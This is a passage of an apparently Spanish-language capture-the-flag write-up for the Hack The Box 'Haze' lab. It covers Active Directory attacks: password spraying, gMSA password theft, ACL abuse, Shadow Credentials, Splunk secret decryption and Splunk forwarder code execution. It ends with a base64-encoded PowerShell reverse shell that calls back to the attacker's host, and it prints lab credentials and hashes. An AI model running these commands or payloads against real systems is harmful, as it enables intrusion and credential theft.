2025/04/02 08:00:37 >  [+] VALID USERNAME:	edward.martin@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	mark.adams@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	Haze-IT-Backup$@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	alexander.green@haze.htb
2025/04/02 08:00:37 >  Done! Tested 9 usernames (7 valid) in 0.224 seconds

Password Spraying

Ejecutamos netexec para realizar password spraying, encontramos que se reutilizo la contrasena de paul.taylor con mark.adams.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

❯ netexec smb 10.10.11.61 -u reg_users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [-] haze.htb\NT AUTHORITY@HAZE.HTB:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\HAZE-IT-BACKUP$@HAZE.HTB:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\PAUL.TAYLOR@HAZE.HTB:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE 
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

Observamos que mark.adams tieme acceso por winrm.

1
2
3
4

❯ netexec winrm 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' 2>/dev/null
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.10.11.61     5985   DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)

Bloodhound

Nuevamente ejecutamos bloodhound esta vez con las credenciales de mark.adams, esta vez muestra ocho usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

❯ python bloodhound.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.10.11.61 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 8 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 39S
INFO: Compressing output into 20250402123700_bloodhound.zip

Se muestra que mark.adams pertenece al grupo GMSA_MANAGERS.

image

Ejecutamos un query en bloodhound que muestra quienes pueden realizar la lectura de contrasenas gMSA, se muestra que los grupos Administrators y Domain Admins pueden realizar la lectura de Haze-It-Backup$. No se observa al grupo GMSA_MANAGERS.

image

gMSA Permissions

El script gMSA_Permissions_Collection.ps1 de kdejoyce utilizado en el post: Securing Your Group Managed Service Accounts, lista los permisos de los objetos que tienen permisos sobre una cuenta MSA (managed service account).

En este caso estariamos listando los permisos sobre Haze-It-Backup$.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

$schemaIDGUID = @{}
Get-ADObject -SearchBase (Get-ADRootDSE).schemaNamingContext -LDAPFilter '(name=ms-ds-GroupMSAMembership)' -Properties name, schemaIDGUID |
ForEach-Object {$schemaIDGUID.add([System.GUID]$_.schemaIDGUID,$_.name)}

$target = 'Haze-IT-Backup$'
$gMSAs = Get-ADServiceAccount -identity $target 

Set-Location ad:
foreach ($gmsa in $gMSAs){
(Get-Acl $gmsa.distinguishedname).access | 
Where-Object { (($_.AccessControlType -eq 'Allow') -and ($_.activedirectoryrights -in ('GenericAll') -and $_.inheritancetype -in ('All', 'None')) -or (($_.activedirectoryrights -like '*WriteProperty*') -and ($_.objecttype -eq '00000000-0000-0000-0000-000000000000')))} |
 ft ([string]$gmsa.name),identityreference, activedirectoryrights, objecttype, isinherited -autosize 
 }

Set-Location ad:
foreach ($gmsa in $gMSAs){
(Get-Acl $gmsa.distinguishedname).access | 
Where-Object {(($_.AccessControlType -eq 'Allow') -and (($_.activedirectoryrights -like '*WriteProperty*') -and ($_.objecttype -in $schemaIDGUID.Keys)))} |
 ft ([string]$gmsa.name),identityreference, activedirectoryrights, objecttype, isinherited -AutoSize
 }

Observamos que gMSA_Managers tiene el permiso WriteProperty sobre Haze-It-Backup$.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

*Evil-WinRM* PS C:\Users\mark.adams\Documents> <# the code above [ snip ] ... #>

Haze-IT-Backup IdentityReference                                                                               ActiveDirectoryRights ObjectType                           IsInherited
-------------- -----------------                                                                               --------------------- ----------                           -----------
               NT AUTHORITY\SYSTEM                                                                                        GenericAll 00000000-0000-0000-0000-000000000000       False
               BUILTIN\Account Operators                                                                                  GenericAll 00000000-0000-0000-0000-000000000000       False
               HAZE\Domain Admins                                                                                         GenericAll 00000000-0000-0000-0000-000000000000       False
               HAZE\Enterprise Admins                                                                                     GenericAll 00000000-0000-0000-0000-000000000000        True
               BUILTIN\Administrators    CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner 00000000-0000-0000-0000-000000000000        True



Haze-IT-Backup IdentityReference  ActiveDirectoryRights ObjectType                           IsInherited
-------------- -----------------  --------------------- ----------                           -----------
               HAZE\gMSA_Managers         WriteProperty 888eedd6-ce04-df40-b462-b8a50e41ba38       False


*Evil-WinRM* PS AD:\>

WriteProperty

Observamos que el valor de PrincipalsAllowedToRetrieveManagedPassword “apunta” al grupo de Domain Admins.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity Haze-IT-Backup -Properties PrincipalsAllowedToRetrieveManagedPassword


DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Domain Admins,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :


*Evil-WinRM* PS C:\Users\mark.adams\Documents>

Con el permiso WriteProperty podemos modificar este ultimo ‘atributo’ al usuario mark.adams, listamos nuevamente y se observa el cambio.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity Haze-IT-Backup -PrincipalsAllowedToRetrieveManagedPassword mark.adams
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Get-ADServiceAccount -Identity Haze-IT-Backup -Properties PrincipalsAllowedToRetrieveManagedPassword


DistinguishedName                          : CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb
Enabled                                    : True
Name                                       : Haze-IT-Backup
ObjectClass                                : msDS-GroupManagedServiceAccount
ObjectGUID                                 : 66f8d593-2f0b-4a56-95b4-01b326c7a780
PrincipalsAllowedToRetrieveManagedPassword : {CN=Mark Adams,CN=Users,DC=haze,DC=htb}
SamAccountName                             : Haze-IT-Backup$
SID                                        : S-1-5-21-323145914-28650650-2368316563-1111
UserPrincipalName                          :


*Evil-WinRM* PS C:\Users\mark.adams\Documents>

ReadGMSAPassword

Podemos utilizar netexec o gMSADumper para obtener el hash NTLM.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

❯ netexec ldap 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.61     636    DC01             [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 
LDAPS       10.10.11.61     636    DC01             [*] Getting GMSA Passwords
LDAPS       10.10.11.61     636    DC01             Account: Haze-IT-Backup$      NTLM: a70df6599d5eab1502b38f9c1c3fd828
❯ python gMSADumper.py -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24' -l haze.htb -d haze.htb
Users or groups who can read password for Haze-IT-Backup$:
 > mark.adams
Haze-IT-Backup$:::a70df6599d5eab1502b38f9c1c3fd828
Haze-IT-Backup$:aes256-cts-hmac-sha1-96:a455156dcce482f3ac359929b41d2f5ead1d72dd764b7f5d9f27a8c2a44a67a6
Haze-IT-Backup$:aes128-cts-hmac-sha1-96:d99b9f57ffe1a4ab867a018a99a7edab

User - Haze-It-Backup

Con el hash del usuario se observa que se tiene acceso unicamente a ldap y smb.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

❯ netexec ldap 10.10.11.61 -u haze-it-backup$ -H a70df6599d5eab1502b38f9c1c3fd828
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\haze-it-backup$:a70df6599d5eab1502b38f9c1c3fd828 
❯ netexec smb 10.10.11.61 -u haze-it-backup$ -H a70df6599d5eab1502b38f9c1c3fd828
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\haze-it-backup$:a70df6599d5eab1502b38f9c1c3fd828 
❯ netexec winrm 10.10.11.61 -u haze-it-backup$ -H a70df6599d5eab1502b38f9c1c3fd828 2>/dev/null
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.10.11.61     5985   DC01             [-] haze.htb\haze-it-backup$:a70df6599d5eab1502b38f9c1c3fd828

Bloodhound

Nuevamente ejecutamos bloodhound esta vez con el usuario haze-it-backup.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

❯ python bloodhound.py -u haze-it-backup$ --hashes :a70df6599d5eab1502b38f9c1c3fd828 -d haze.htb -dc dc01.haze.htb -ns 10.10.11.61 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 9 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 40S
INFO: Compressing output into 20250402133856_bloodhound.zip

Haze-It-Backup tiene permisos WriteOwner sobre el grupo SUPPORT_SERVICES.

image

SUPPORT_SERVICES tiene permisos ForceChangePassword y AddKeyCredentialLink sobre el usuario Edward Martin.

image

Con esto encontramos como llegar desde Haze-It-Backup hasta Edward Martin.

image

User - Edward.Martin

WriteOwner on Group

Generamos un ticket para haze-it-backup especificando su hash, luego ejecutamos impacket-owneredit para cambiar el ownership de SUPPORT_SERVICES a haze-it-backup$.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

❯ impacket-getTGT haze.htb/haze-it-backup -hashes :a70df6599d5eab1502b38f9c1c3fd828
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in haze-it-backup$.ccache

export KRB5CCNAME=haze-it-backup$.ccache; impacket-owneredit -action write -new-owner 'haze-it-backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb/haze-it-backup$' -k -no-pass -dc-ip 10.10.11.61 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!

Ejecutamos impacket-dacledit para darle ‘Full Control’ a haze-it-backup$ sobre SUPPORT_SERVICES.

1
2
3
4
5
6

❯ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'haze-it-backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=HAZE,DC=HTB' 'haze.htb/haze-it-backup$' -k -no-pass -dc-ip 10.10.11.61 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250402-135928.bak
[*] DACL modified successfully!

Con bloodyAD.py se agrego al usuario haze-it-backup$ al grupo SUPPORT_SERVICES.

1
2
3

KRB5CCNAME=~/htb/haze/haze-it-backup$.ccache python bloodyAD.py --host "dc01.haze.htb" --dc-ip 10.10.11.61 -d "haze.htb" -u 'haze-it-backup$' -k add groupMember "SUPPORT_SERVICES" "haze-it-backup$"
[+] haze-it-backup$ added to SUPPORT_SERVICES

Shadow Credentials

Se ejecuto PyWhisker para realizar Shadow Credentials attack.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

KRB5CCNAME=~/htb/haze/haze-it-backup$.ccache python pywhisker/pywhisker.py -d "haze.htb" -u "haze-it-backup$" -H :a70df6599d5eab1502b38f9c1c3fd828 --target "edward.martin" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a907891c-4d46-6da9-a574-17fb026be17d
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: V8RHny77.pfx
[+] PFX exportiert nach: V8RHny77.pfx
[i] Passwort für PFX: 5zdcbIoP8UGpALBXEuLt
[+] Saved PFX (#PKCS12) certificate & key at path: V8RHny77.pfx
[*] Must be used with password: 5zdcbIoP8UGpALBXEuLt
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Se sugiere PKINITtools para obtener TGT pero certipy-ad lo simplifica y obtenemos el hash de edward.martin.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

❯ certipy-ad cert -export -pfx "V8RHny77.pfx" -password "5zdcbIoP8UGpALBXEuLt" -out unprotected_pfx.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unprotected_pfx.pfx'
❯ certipy-ad auth -pfx unprotected_pfx.pfx -username "edward.martin" -domain "haze.htb"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Got hash for 'edward.martin@haze.htb': aad3b435b51404eeaad3b435b51404ee:09e0b3eeb2e7a6b0d419e9ff8f4d91af

El usuario tiene acceso por WinRM.

1
2
3
4

❯ netexec winrm 10.10.11.61 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af 2>/dev/null
WINRM       10.10.11.61     5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM       10.10.11.61     5985   DC01             [+] haze.htb\edward.martin:09e0b3eeb2e7a6b0d419e9ff8f4d91af (Pwn3d!)

Shell

Obtuvimos una shell con evil-winrm y el acceso a la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

❯ evil-winrm -i haze.htb -u 'edward.martin' -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents> whoami
haze\edward.martin
*Evil-WinRM* PS C:\Users\edward.martin\Documents> type ../Desktop/user.txt
543ad4c4afe331f2e1e328338e7b55d5
*Evil-WinRM* PS C:\Users\edward.martin\Documents>

User - alexander.green

Nuevamente se realizo la ejecucion de bloodhound con el usuario edward.martin, se observa que pertenece al grupo BACKUP_REVIEWERS el cual no tiene ningun tipo de permiso sobre usuario o grupo.

image

Splunk Backup

Encontramos el directorio Backups\ al cual pueden acceder Administrators y el grupo Backup_Reviewers.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

*Evil-WinRM* PS C:\Users\edward.martin> cd C:/
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/5/2025  12:32 AM                Backups
d-----         3/25/2025   2:06 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---          3/4/2025  11:28 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---          4/2/2025   9:43 AM                Users
d-----         3/25/2025   2:15 PM                Windows

*Evil-WinRM* PS C:\> icacls Backups
Backups HAZE\Backup_Reviewers:(OI)(CI)(RX)
        CREATOR OWNER:(OI)(CI)(IO)(F)
        NT AUTHORITY\SYSTEM:(OI)(CI)(F)
        BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\>

Dentro de este directorio encontramos por su nombre, un backup de splunk el cual descargamos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

*Evil-WinRM* PS C:\> cd backups
*Evil-WinRM* PS C:\backups> dir


    Directory: C:\backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/5/2025  12:33 AM                Splunk


*Evil-WinRM* PS C:\backups> cd Splunk
*Evil-WinRM* PS C:\backups\Splunk> dir


    Directory: C:\backups\Splunk


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2024   3:22 PM       27445566 splunk_backup_2024-08-06.zip


*Evil-WinRM* PS C:\backups\Splunk> download splunk_backup_2024-08-06.zip
                                        
Info: Downloading C:\backups\Splunk\splunk_backup_2024-08-06.zip to splunk_backup_2024-08-06.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\backups\Splunk>

Al extraer el contenido observamos un backup de la carpeta Splunk.

1
2
3
4
5
6
7
8

❯ ll
drwxrwxr-x kali kali 4.0 KB Tue Aug  6 22:52:06 2024  Splunk
.rw-rw-r-- kali kali  26 MB Wed Apr  2 14:14:45 2025  splunk_backup_2024-08-06.zip
cd Splunk
❯ ls
 bin     etc   opt          quarantined_files   swidtag   copyright.txt      license-eula.txt   README-splunk.txt
 cmake   lib   Python-3.7   share               var       license-eula.rtf   openssl.cnf        splunk-9.2.1-78803f08aabb-windows-64-manifest

Hashcat

Intentamos realizar un crackeo al hash de etc/passwd pero no se ecuentra en el wordlist de rockyou.

1
2
3

❯ cat etc/passwd
:admin:$6$8FRibWS3pDNoVWHU$vTW2NYea7GiZoN0nE6asP6xQsec44MlcK2ZehY5RC4xeTAz4kVVcbCkQ9xBI2c7A8VPmajczPOBjcVgccXbr9/::Administrator:admin:changeme@example.com:::19934

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

PS C:\Users\sckull\Documents\hashcat-6.2.6> .\hashcat.exe -m 1800 ..\hash\haze_admin_splunk_backup rockyou.txt
hashcat (v6.2.6) starting

[...]

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 281 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

[...]

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$8FRibWS3pDNoVWHU$vTW2NYea7GiZoN0nE6asP6xQsec44Ml...cXbr9/
Time.Started.....: Wed Apr 02 04:22:01 2025 (2 mins, 55 secs)
Time.Estimated...: Wed Apr 02 04:24:56 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    82050 H/s (6.72ms) @ Accel:64 Loops:256 Thr:256 Vec:1
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4864-5000
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[213330383839] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 51c Fan: 45% Util: 94% Core:2760MHz Mem:8251MHz Bus:8

Started: Wed Apr 02 04:22:00 2025
Stopped: Wed Apr 02 04:24:57 2025
PS C:\Users\sckull\Documents\hashcat-6.2.6>

Splunk Secrets

Con grep realizamos una busqueda de bindDNpassword observamos multiples archivos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

❯ grep -color -iwr 'bindDNpassword'
var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
var/run/splunk/confsnapshot/baseline_default/system/default/server.conf
var/run/splunk/merged/server.conf
var/lib/splunk/_configtracker/db/db_1722472274_1722472274_1/rawdata/0
var/lib/splunk/_configtracker/db/db_1722816408_1722816408_2/rawdata/0
var/lib/splunk/_configtracker/db/hot_v1_3/rawdata/0
var/lib/splunk/_configtracker/db/hot_v1_3/1722932036-1722932036-10796068698853212442.tsidx
var/lib/splunk/_configtracker/db/db_1722374849_1722374525_0/merged_lexicon.lex
var/lib/splunk/_configtracker/db/db_1722374849_1722374525_0/1722374560-1722374525-11402003354716798095.tsidx
var/log/splunk/configuration_change.log
etc/system/README/authentication.conf.example
etc/system/README/authentication.conf.spec
etc/system/default/server.conf

authentication.conf contiene el cifrado de contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

❯ cat var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
[default]

minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0


[Haze LDAP Auth]

SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

Ejecutamos splunksecrets especificando el archivo .secret y el cifrado, este nos devolvio la contrasena.

1
2
3

❯ splunksecrets splunk-decrypt -S etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI=' 2>/dev/null
Sp1unkadmin@2k24

Splunk Access

El par de credenciales admin : Sp1unkadmin@2k24 nos permitio el acceso al dashboard de Splunk.

image

Splunk UF - RCE

La API de Splunk permite “instalar scripts” a traves de Splunk UF de manera remota, lo que permite la ejecucion de comandos, como se expone en Abusing Splunk Forwarders For Shells and Persistence.

Ejecutamos PySplunkWhisperer2_remote con las credenciales de admin, especificando el lhost y el payload el cual se define como un ping a nuestra maquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

❯ python test.py --host 10.10.11.61 --username admin --password 'Sp1unkadmin@2k24' --payload 'ping 10.10.14.105' --lhost 10.10.14.105
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp4exf966f.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.105:8181/
10.10.11.61 - - [03/Apr/2025 06:39:49] "GET / HTTP/1.1" 200 -

[+] App installed, your code should be running now!

Press RETURN to cleanup
[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

Tras la ejecucion observamos la ejecucion exitosa del ping en tcpdump.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

❯ sudo tcpdump -i tun0 icmp
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
06:37:36.209153 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1488, length 40
06:37:36.209220 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1488, length 40
06:37:37.174422 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1489, length 40
06:37:37.174443 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1489, length 40
06:37:38.084975 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1490, length 40
06:37:38.084998 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1490, length 40
06:37:38.998751 IP haze.htb > 10.10.14.105: ICMP echo request, id 1, seq 1491, length 40
06:37:38.998773 IP 10.10.14.105 > haze.htb: ICMP echo reply, id 1, seq 1491, length 40

Shell

Ejecutamos una shell inversa de powershell generada por revshells.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

❯ python PySplunkWhisperer2_remote.py --host 10.10.11.61 --username admin --password 'Sp1unkadmin@2k24' --payload 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAwADUAIgAsADEAMwAzADgAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA' 